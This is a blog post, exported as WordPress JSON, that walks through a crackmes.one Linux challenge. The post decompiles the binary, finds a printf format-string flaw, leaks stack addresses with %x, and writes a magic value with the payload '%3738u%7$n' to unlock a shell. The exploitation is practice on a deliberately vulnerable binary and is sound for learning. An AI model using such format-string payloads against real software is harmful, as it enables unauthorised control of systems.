{"id":11238,"date":"2021-05-18T10:16:18","date_gmt":"2021-05-18T10:16:18","guid":{"rendered":"http:\/\/www.max-sperling.bplaced.net\/?p=11238"},"modified":"2024-02-16T10:16:11","modified_gmt":"2024-02-16T10:16:11","slug":"crackmes-one-example-3","status":"publish","type":"post","link":"http:\/\/www.max-sperling.bplaced.net\/?p=11238","title":{"rendered":"crackmes.one (Example 3)"},"content":{"rendered":"<p><strong>Setup<\/strong><\/p>\n<p><u>Data<\/u><\/p>\n<ul>\n<li>URL: <a href=\"https:\/\/crackmes.one\/crackme\/5e74a49833c5d4439bb2def5\">BitFriends&#8217;s admin_panel<\/a><\/li>\n<li>Language: C\/C++<\/li>\n<li>Platform: Unix\/Linux (ELF64)<\/li>\n<li>Description: &#8220;Welcome to my little crackme! Your goal is to get a shell!<br \/>\nAs usual patching is not allowed. ld_preload, dll injection and rootkits are not allowed too. I hope the crackme is not overrated or underated. Have fun!&#8221;<\/li>\n<\/ul>\n<p><u>Output<\/u><\/p>\n<pre>\r\n$ .\/admin_panel \r\nWelcome to the admin panel! The program which admins can\r\ninteract with on a guest computer to do admin stuff!\r\n\r\nstatus: (admin=false; shell=unavailable)\r\n\r\n*> \r\n<\/pre>\n<hr>\n<p><strong>Analysis<\/strong><\/p>\n<p><u>Tools<\/u><br \/>\nCutter\/Radare2<\/p>\n<p><u>Decompiler<\/u> (Commented)<\/p>\n<pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\r\nundefined8 main(void)\r\n{\r\n    int32_t iVar1;\r\n    int64_t iVar2;\r\n    undefined8 uVar3;\r\n    int64_t in_FS_OFFSET;\r\n    char *src;\r\n    char *dest;\r\n    char *format;\r\n    int64_t canary;\r\n    \r\n    canary = *(int64_t *)(in_FS_OFFSET + 0x28);\r\n    strcpy(&amp;dest, admin, admin);\r\n    puts(\r\n        &quot;Welcome to the admin panel! The program which admins can\\ninteract with on a guest computer to do admin stuff!\\n&quot;\r\n        );\r\n    while( true ) {\r\n        if (_admin != 0xe9a) {\r\n            puts(&quot;status: (admin=false; shell=unavailable)\\n&quot;);\r\n        }\r\n        if (_admin == 0xe9a) {\r\n            puts(&quot;status: (admin=true; shell=available)\\n&quot;);\r\n        }\r\n        printf(0x20cf); \/\/ 0x20cf:&quot;*&gt; &quot;\r\n        iVar2 = fgets(&amp;format, 0x100, _reloc.stdin);\r\n        if (iVar2 == 0) break;\r\n        strtok(&amp;format, 0x20d3); \/\/ 0x20d3:&quot;\\n&quot;; Removes &quot;\\n&quot; from &amp;format\r\n        iVar1 = strcmp(&amp;format, 0x20d5); \/\/ 0x20d5:&quot;shell&quot;\r\n        if ((iVar1 == 0) &amp;&amp; (_admin == 0xe9a)) {\r\n            system(&quot;\/bin\/bash&quot;);\r\n        } else {\r\n            printf(&quot;input: &quot;);\r\n            printf(&amp;format);\r\n            puts(0x20d3);\r\n        }\r\n    }\r\n    uVar3 = 0;\r\n    if (canary != *(int64_t *)(in_FS_OFFSET + 0x28)) {\r\n        uVar3 = __stack_chk_fail();\r\n    }\r\n    return uVar3;\r\n}\r\n<\/pre>\n<p><u>Conclusion<\/u><br \/>\nThe value of iVar1 has to be 0 and the value of admin (bss segment addr: 0x407c) has to be 0xe9a. To get iVar1 to 0 we have to enter &#8220;shell\\n&#8221;. To get admin to 0xe9a we have to find a vulnerability to write that value. The app prints out what we have entered so we can possibly use a format string attack.<\/p>\n<p>Attached gdb to running admin_panel process to resolve address.<\/p>\n<pre>\r\n$ pidof admin_panel\r\n3915\r\n$ sudo gdb ~\/Downloads\/admin_panel\r\n(gdb) attach 3915\r\n(gdb) p &admin\r\n$1 = (<data variable, no debug info> *) 0x559045ffb07c <admin>\r\n<\/pre>\n<p>That address (&#038;admin) changes with every new startup.<\/p>\n<p>Let&#8217;s find out if that address is currently stored on the stack.<\/p>\n<pre>\r\n*> %x %x %x %x %x %x %x %x\r\ninput: 45ff90ec aff3c780 7 b014d700 7 2e5f26f2 45ffb07c b014d700\r\n<\/pre>\n<p>Indeed it is at position 7.<\/p>\n<hr>\n<p><strong>Solution<\/strong><\/p>\n<p><u>Format string<\/u><br \/>\nLet&#8217;s overwrite the value (to 0xe9a) to which the 7th parameter is pointing.<\/p>\n<p>1. Let&#8217;s print out the 7th parameter<\/p>\n<pre>\r\n*> %7$x\r\ninput: 45ffb07c\r\n<\/pre>\n<p>2. Let&#8217;s write a number to the 7th param<\/p>\n<pre>\r\n*>     %7$n\r\ninput:     \r\n<\/pre>\n<pre>\r\n(gdb) x\/x &admin\r\n0x559045ffb07c <admin>:\t0x00000004\r\n<\/pre>\n<p>The value of 4 has been written to admin, cause there have been 4 characters (here: spaces) entered before %7$n.<\/p>\n<p>3. Let&#8217;s write 0xe9a to the 7th param<\/p>\n<pre>\r\n*> %3738u%7$n\r\n\r\nstatus: (admin=true; shell=available)\r\n<\/pre>\n<p>E9A hex is 3738 dec. Also valid: <\/p>\n<pre>\"%3737u %7$n\", \"%3736u  %7$n\", \"%3735u   %7$n\", ...<\/pre>\n<pre>\r\n(gdb) x\/x &admin\r\n0x559045ffb07c <admin>:\t0x00000e9a\r\n<\/pre>\n<p>For more informations: <a href=\"https:\/\/braddaniels.org\/format-string-vulns\/\">Brad Daniels Blog<\/a><\/p>\n<p><u>Output<\/u><\/p>\n<pre>\r\n*> %3738u%7$n\r\n\r\nstatus: (admin=true; shell=available)\r\n\r\n*> shell\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Setup Data URL: BitFriends&#8217;s admin_panel Language: C\/C++ Platform: Unix\/Linux (ELF64) Description: &#8220;Welcome to my little crackme! Your goal is to<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false},"categories":[39],"tags":[],"_links":{"self":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/11238"}],"collection":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11238"}],"version-history":[{"count":1,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/11238\/revisions"}],"predecessor-version":[{"id":16710,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/11238\/revisions\/16710"}],"wp:attachment":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11238"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}